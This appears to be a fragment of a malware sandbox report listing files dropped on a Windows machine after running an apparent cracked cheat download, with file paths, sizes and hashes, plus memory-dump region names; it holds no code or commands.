Filesize
40KB

MD5
a182561a527f929489bf4b8f74f65cd7

SHA1
8cd6866594759711ea1836e86a5b7ca64ee8911f

SHA256
42aad7886965428a941508b776a666a4450eb658cb90e80fae1e7457fc71f914

SHA512
9bc3bf5a82f6f057e873adebd5b7a4c64adef966537ab9c565fe7c4bb3582e2e485ff993d5ab8a6002363231958fabd0933b48811371b8c155eaa74592b66558

Download Submit
C:\Users\Admin\AppData\Roaming\CrystalIdea Software\Uninstall Tool\preferences.xml

Filesize
1KB

MD5
23618daa6d7d186c500d713997df0031

SHA1
aec490f22c95101f8dc2f6c7d6c6d04bb32b966f

SHA256
0237bf82b7610c21bf77e99037ba18d73c9fccec531b49f08e9b821825cbfa00

SHA512
fc2045ae65cb289ea1a89a908f0598ba6c78279ae092e41e4966504a5aef6927ad4825d142f4a88c1c54da6f531e6ace0a9588930f037416fe154256dffedf73

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Uninstall Tool.lnk

Filesize
1KB

MD5
d8ed57306444fb7b88d81bc91eac210e

SHA1
2e81f369226690518b2710a8310bf1a0e0342bd0

SHA256
6c76f6d57896ddcd9a30817daf530a38aaa2939af8d427e3fb0d3f95449a4843

SHA512
a1c9f5c3bab7bb67f9977ff382521545cf5a40c9f9260268064563531777ad9de73cc3017366c4ac1c35d85f52db8b7fd42987d62b9e8bc7c1790db0ca051a79

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\AutomaticDestinations\f01b4d95cf55d32a.automaticDestinations-ms

Filesize
8KB

MD5
df3ad1015f044af94cce95d687970d0e

SHA1
b4acd8e65c27ee6978270fd16e5f9cbc1dadee91

SHA256
186c0114385b5286325f13e03b9485afbd19638e9e50ecdbb3fd733e8e869641

SHA512
0e732ada01d44b72e4752e0f6bccaba517e2b25fd5382c09736a0d20b331414d73428d334ee42aa9aae6a40942800c0df46be3d0c323b295f3b1ead29aac2a78

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\269c0465f0b4b6ee.customDestinations-ms

Filesize
5KB

MD5
8f6a8e5a242bc263561206f4dad67aa8

SHA1
e68c14f9380e770e51a40786ea8dd5b1458b3c8c

SHA256
fcb7fa89680616fe4db029248a4650e383ec45cb490738b1f66b75383fc115d2

SHA512
dd6f2451b6e1e448d87d1a7d637f12ac9e38ed28ed6bd5124603f7e553c817c618608da89fe8d600a7426e1ca55cbda1f3d8ccf4e28205289b70d152e20f2b39

Download Submit
C:\Users\Admin\Downloads\508aacd5-d48f-4862-9b00-76cb568f8c3d.tmp

Filesize
8.3MB

MD5
4656e28535d3357302b6fbb676ffe6c1

SHA1
0c31514517ac0244e196d013cddcaae50adfae68

SHA256
3df9f4e81293090005d8728bc2f8879a929fc6cd33bf1e6e1a5798b8772dcf35

SHA512
143ec95217bdcd34155e90d637e66b7b7557021a78171ee79f525906da9ce01f8630e136dde5f11d3a1589d0c5a42bd7de3cba0d351444c14a54daabb86e045f

Download Submit
C:\Users\Admin\Downloads\FATALITY crack.rar:Zone.Identifier

Filesize
26B

MD5
fbccf14d504b7b2dbcb5a5bda75bd93b

SHA1
d59fc84cdd5217c6cf74785703655f78da6b582b

SHA256
eacd09517ce90d34ba562171d15ac40d302f0e691b439f91be1b6406e25f5913

SHA512
aa1d2b1ea3c9de3ccadb319d4e3e3276a2f27dd1a5244fe72de2b6f94083dddc762480482c5c2e53f803cd9e3973ddefc68966f974e124307b5043e654443b98

Download Submit
C:\Users\Admin\Downloads\Unconfirmed 288734.crdownload

Filesize
5.7MB

MD5
417161bef8a9990d7d99cd660042608d

SHA1
8b319c3ec6cff5a598f7ee3be643a1e13ac85a1b

SHA256
66b696e76af8e72272883e22e7f5e42e168195c2e42fddf6d9e4e59c8a003ee4

SHA512
3603a744fad93c6b0f48a9ab5795193b0c5c5e145fa80d5c5b0214efc62b39e80d3c83fe04b90b48aca2dd504c4b4f6cfa3f896f66cf76dc204e661ba36b0ae6

Download Submit
C:\Users\Admin\Downloads\crack.pdb

Filesize
175KB

MD5
bba057869db12538db08489b52e24f8e

SHA1
1f97afcdb8e6efdde576f8341b9db6e928c901e8

SHA256
3f2ffba4d665d930671518bdf7ccd59e1d63c7c0ae568e98d7e379fc40c952d1

SHA512
b4d793425ded065683ae9910545b00dea7b581bdebee6d543ceebb78e2d121e4447daa33a70f2e1066b676bffb04f9fa13fac7afdf5c2b23b05d33b4bb9a6469

Download Submit
memory/1204-1561-0x000001A70F9B0000-0x000001A70F9F0000-memory.dmp

Filesize
256KB

Download
memory/1204-1585-0x000001A7116B0000-0x000001A7116CE000-memory.dmp

Filesize
120KB

Download
memory/1204-1584-0x000001A72A270000-0x000001A72A2C0000-memory.dmp

Filesize
320KB

Download
memory/1204-1631-0x000001A72A440000-0x000001A72A5F3000-memory.dmp

Filesize
1.7MB

Download
memory/1204-1583-0x000001A72A1F0000-0x000001A72A266000-memory.dmp

Filesize
472KB

Download
memory/1204-1614-0x000001A711700000-0x000001A71170A000-memory.dmp

Filesize
40KB

Download
memory/1204-1615-0x000001A72A170000-0x000001A72A182000-memory.dmp

Filesize
72KB

Download
memory/1248-1204-0x0000029B74BC0000-0x0000029B74BE2000-memory.dmp

Filesize
136KB

Download
memory/1248-1213-0x0000029B74FA0000-0x0000029B74FBC000-memory.dmp

Filesize
112KB

Download
memory/1248-1214-0x0000029B74FC0000-0x0000029B74FCA000-memory.dmp

Filesize
40KB

Download
memory/3752-1173-0x0000000000400000-0x0000000000717000-memory.dmp

Filesize
3.1MB

Download
memory/3752-1225-0x0000000000400000-0x0000000000717000-memory.dmp

Filesize
3.1MB

Download
memory/4320-1172-0x0000000000400000-0x00000000004DC000-memory.dmp

Filesize
880KB

Download
memory/4320-998-0x0000000000400000-0x00000000004DC000-memory.dmp

Filesize
880KB

Download
memory/4320-1226-0x0000000000400000-0x00000000004DC000-memory.dmp

Filesize
880KB

Download
memory/4948-1227-0x0000000000400000-0x0000000000474000-memory.dmp

Filesize
464KB

Download
memory/4948-1255-0x0000000000400000-0x0000000000474000-memory.dmp

Filesize
464KB

Download